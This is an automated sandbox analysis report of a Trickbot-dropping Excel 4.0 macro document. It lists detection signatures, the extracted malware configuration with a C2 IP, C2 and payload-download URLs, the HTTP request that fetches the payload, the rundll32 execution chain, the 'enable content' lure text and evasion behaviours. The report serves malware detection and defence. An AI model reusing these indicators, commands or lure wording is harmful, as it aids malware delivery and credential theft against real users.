
Analysis Report SecuriteInfo.com.Exploit.Siggen3.10350.13127.32739

Overview

General Information

Sample Name: SecuriteInfo.com.Exploit.Siggen3.10350.13127.32739 (renamed file extension from 32739 to xls)
Analysis ID: 355606
MD5: 31964397103260697c37ee4237194da9
SHA1: 7c2dc1c68e4aeff9adef87c3ddfc53592c2b2c94
SHA256: 12956825df5f2b791e53c1a2ab9d7afbd8e59411b01f61a1f78ef6c5770c3ef4

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Trickbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1916 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2828 cmdline: rundll32 ..\BASE.BABAA,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 1980 cmdline: rundll32 ..\BASE.BABAA,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • wermgr.exe (PID: 2884 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
        • wermgr.exe (PID: 2892 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
  • cleanup

Malware Configuration

Threatname: Trickbot

{"gtag": "rob60", "C2 list": ["200.52.147.93:443"], "modules": ["pwgrab", "mcconf"]}

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x26ca2:$s1: Excel
  • 0x27d0a:$s1: Excel
  • 0x35b4:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.2081720951.00000000005D8000.00000004.00000001.sdmp | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security
00000004.00000003.2077502883.0000000000764000.00000004.00000001.sdmp | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security
00000004.00000002.2081503635.0000000000130000.00000040.00000001.sdmp | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security
00000004.00000003.2077497175.0000000000764000.00000004.00000001.sdmp | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security
00000004.00000002.2081774299.0000000000730000.00000004.00000020.sdmp | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.rundll32.exe.130000.0.unpack | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security
4.2.rundll32.exe.130000.0.raw.unpack | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: rundll32 ..\BASE.BABAA,DllRegisterServer, CommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1916, ProcessCommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer, ProcessId: 2828

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://www.chipmania.it/mails/open.php | Avira URL Cloud: Label: malware
Found malware configuration
Source: wermgr.exe.2892.6.memstr | Malware Configuration Extractor: Trickbot {"gtag": "rob60", "C2 list": ["200.52.147.93:443"], "modules": ["pwgrab", "mcconf"]}
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls | Virustotal: Detection: 11%
Yara detected Trickbot
Source: Yara match | File source: Process Memory Space: wermgr.exe PID: 2892, type: MEMORY
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007BCA0 CryptAcquireContextW,

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown | HTTPS traffic detected: 142.202.191.164:443 -> 192.168.2.22:49166 version: TLS 1.0
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb source: rundll32.exe, 00000004.00000002.2082692361.000000006E869000.00000002.00020000.sdmp, BASE.BABAA.0.dr
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00061290 FindFirstFileW,
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000646F0 FindFirstFileW,FindNextFileW,

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: 10[1].jjkes.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe
Source: excel.exe | Memory has grown: Private usage: 4MB later: 60MB
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then dec eax (9 occurrences)
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then movzx edx, word ptr [eax]
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then inc dword ptr [esp+40h]
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then inc ecx
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then dec ecx
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then inc esp (2 occurrences)
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then cmp byte ptr [ecx+edx+01h], 00000000h
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then movzx ecx, word ptr [eax+02h]
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then movzx eax, byte ptr [ebx]
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then inc edx
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then movzx ebx, word ptr [eax]
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then mov ebx, edx
Source: global traffic | DNS query: name: www.chipmania.it
Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.202.191.164:443
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 185.81.0.78:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404306 ET CNC Feodo Tracker Reported CnC Server TCP group 4 192.168.2.22:49166 -> 142.202.191.164:443
Source: Traffic | Snort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.22:49168 -> 108.170.20.75:443
Source: Traffic | Snort IDS: 2404324 ET CNC Feodo Tracker Reported CnC Server TCP group 13 192.168.2.22:49170 -> 200.52.147.93:443
Source: Traffic | Snort IDS: 2404316 ET CNC Feodo Tracker Reported CnC Server TCP group 9 192.168.2.22:49171 -> 186.137.85.76:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | IPs: 200.52.147.93:443
Source: Joe Sandbox View | IP Address: 142.202.191.164
Source: Joe Sandbox View | IP Address: 108.170.20.75
Source: Joe Sandbox View | IP Address: 185.81.0.78
Source: Joe Sandbox View | ASN Name: DYNUUS
Source: Joe Sandbox View | ASN Name: SSASN2US
Source: Joe Sandbox View | ASN Name: RedesyTelecomunicacionesHN
Source: Joe Sandbox View | JA3 fingerprint: 8c4a22651d328568ec66382a84fc505f
Source: global traffic | HTTP traffic detected:
    GET /mails/open.php HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: www.chipmania.it
    Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 142.202.191.164:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown | TCP traffic detected without corresponding DNS query: 142.202.191.164 (10 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 108.170.20.75 (6 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 200.52.147.93 (10 occurrences)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ
Source: rundll32.exe, 00000003.00000002.2082979056.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2081858418.0000000002130000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349178856.00000000338E0000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: www.chipmania.it
Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: wermgr.exe, 00000006.00000002.2343826790.00000000002C1000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.6.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enl
Source: rundll32.exe, 00000003.00000002.2082979056.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2081858418.0000000002130000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349178856.00000000338E0000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2082979056.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2081858418.0000000002130000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349178856.00000000338E0000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2083207432.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082015096.0000000002317000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349365108.0000000033AC7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2083207432.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082015096.0000000002317000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349365108.0000000033AC7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: wermgr.exe, 00000006.00000002.2348794656.00000000334F0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: wermgr.exe, 00000006.00000002.2349584225.0000000034050000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: rundll32.exe, 00000003.00000002.2083207432.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082015096.0000000002317000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349365108.0000000033AC7000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2083207432.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082015096.0000000002317000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349365108.0000000033AC7000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: wermgr.exe, 00000006.00000002.2348794656.00000000334F0000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rundll32.exe, 00000003.00000002.2082979056.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2081858418.0000000002130000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349178856.00000000338E0000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2083207432.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082015096.0000000002317000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349365108.0000000033AC7000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2082979056.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2081858418.0000000002130000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349178856.00000000338E0000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: wermgr.exe, 00000006.00000002.2349178856.00000000338E0000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: wermgr.exe, 00000006.00000002.2343779349.000000000024A000.00000004.00000020.sdmp | String found in binary or memory: https://142.202.191.164/rob60/320946_W617601.F9BBFBBC7DBF7A22FB7533B3DADD73B3/5/file/
Source: wermgr.exe, 00000006.00000002.2343826790.00000000002C1000.00000004.00000020.sdmp, wermgr.exe, 00000006.00000002.2343761722.000000000021E000.00000004.00000020.sdmp | String found in binary or memory: https://200.52.147.93/rob60/320946_W617601.F9BBFBBC7DBF7A22FB7533B3DADD73B3/5/file/
Source: wermgr.exe, 00000006.00000002.2343761722.000000000021E000.00000004.00000020.sdmp | String found in binary or memory: https://200.52.147.93/rob60/320946_W617601.F9BBFBBC7DBF7A22FB7533B3DADD73B3/5/file//
Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49166 -> 443

E-Banking Fraud:

Yara detected Trickbot
Source: Yara match | File source: Process Memory Space: wermgr.exe PID: 2892, type: MEMORY

System Summary:

Found malicious Excel 4.0 Macro
Source: SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls | Initial sample: urlmon
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable editing button from the yellow bar above 15 16 Once you have enabled editing, please click
Source: Screenshot number: 4 | Screenshot OCR: Enable content button ,1 " from the yellow bar above )1 23 24 25 26 27 28 29 30 31 32 3
Source: Document image extraction number: 0 | Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
Source: Document image extraction number: 0 | Screenshot OCR: Enable content button from the yellow bar above I \ , I ' /
Source: Document image extraction number: 1 | Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
Source: Document image extraction number: 1 | Screenshot OCR: Enable content button from the yellow bar above j'
Found Excel 4.0 Macro with suspicious formulas
Source: SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls | Initial sample: EXEC
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\BASE.BABAA
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007B470 NtDelayExecution,
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000743C0 NtQuerySystemInformation,DuplicateHandle,CLSIDFromString,HeapFree,
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00082060
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007BCA0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00078CA0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006E0F0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00061290
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000743C0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00068010
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00077840
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00080870
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000644C0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000790E0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000714F0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00061500
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00076100
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00076D10
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00072580
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000789B0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00069200
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007CA00
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007BE20
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00077630
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007CE70
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006A280
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006C290
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006CEB0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007B700
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00073B00
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006E310
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00062720
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00075F70
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000763A8
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000717B0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000A0040
Source: SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls | OLE indicator, VBA macros: true
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
Source: Joe Sandbox View | Dropped File: C:\Users\user\BASE.BABAA AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
Source: SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls, type: SAMPLE | Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: rundll32.exe, 00000003.00000002.2082979056.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2081858418.0000000002130000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349178856.00000000338E0000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal100.troj.expl.evad.winXLS@9/11@1/4
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00064C40 LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\AEBE0000
Source: C:\Windows\System32\wermgr.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\{0F3EC383-8D4F-8C99-8BC8-F01525837B0B}
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRB309.tmp
Source: SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls | OLE indicator, Workbook stream: true
Source: C:\Windows\System32\wermgr.exe | System information queried: HandleInformation
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
Source: SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls | Virustotal: Detection: 11%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
Source: unknown | Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: unknown | Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb source: rundll32.exe, 00000004.00000002.2082692361.000000006E869000.00000002.00020000.sdmp, BASE.BABAA.0.dr
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00281BD0 push dword ptr [edx+14h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00281C7A push dword ptr [edx+14h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00281CFD push dword ptr [edx+14h]; ret
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007D0F0 push 8B48D233h; iretd
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkesJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkesJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file

                Boot Survival:

                Drops PE files to the user root directory
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\BASE.BABAA
                Source: C:\Windows\System32\wermgr.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (26 occurrences)
                Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wermgr.exe | Process information set: NOOPENFILEERRORBOX (2 occurrences)

                Malware Analysis System Evasion:

                Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
                Source: C:\Windows\System32\wermgr.exe | Function Chain: threadCreated,threadDelayed,threadDelayed,userTimerSet,threadDelayed,threadDelayed,fileVolumeQueried,adjustToken,handleClosed,systemQueried,systemQueried,threadDelayed,mutantCreated,threadInformationSet,threadInformationSet,languageOrLocalQueried,threadDelayed,threadDelayed,threadDelayed,threadInformationSet,threadInformationSet,systemQueried,systemQueried,fileOpened,directoryQueried
